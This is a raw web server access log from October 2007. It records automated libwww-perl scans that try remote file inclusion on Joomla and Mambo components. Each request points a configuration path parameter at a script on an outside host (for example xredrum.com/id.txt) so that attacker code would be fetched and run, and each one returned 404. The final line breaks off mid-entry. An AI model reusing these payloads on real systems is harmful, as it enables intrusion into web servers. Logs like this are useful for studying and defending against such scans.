216.151.138.48 - - [21/Oct/2007:18:13:10 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:13:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:13:23 -0700] "GET /logs/access_071008.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.43.230.20 - - [21/Oct/2007:18:13:28 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:18:13:28 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:18:13:28 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:18:13:28 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:18:13:29 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:31 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:31 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:32 -0700] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:18:13:42 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.43.230.20 - - [21/Oct/2007:18:13:57 -0700] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:18:13:58 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:18:13:58 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:18:14:17 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
203.171.31.19 - - [21/Oct/2007:18:14:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:18:14:18 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.205.60.84 - - [21/Oct/2007:18:14:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802"
61.205.60.84 - - [21/Oct/2007:18:14:47 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802"
203.171.31.19 - - [21/Oct/2007:18:15:10 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:18:15:32 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:18:15:32 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5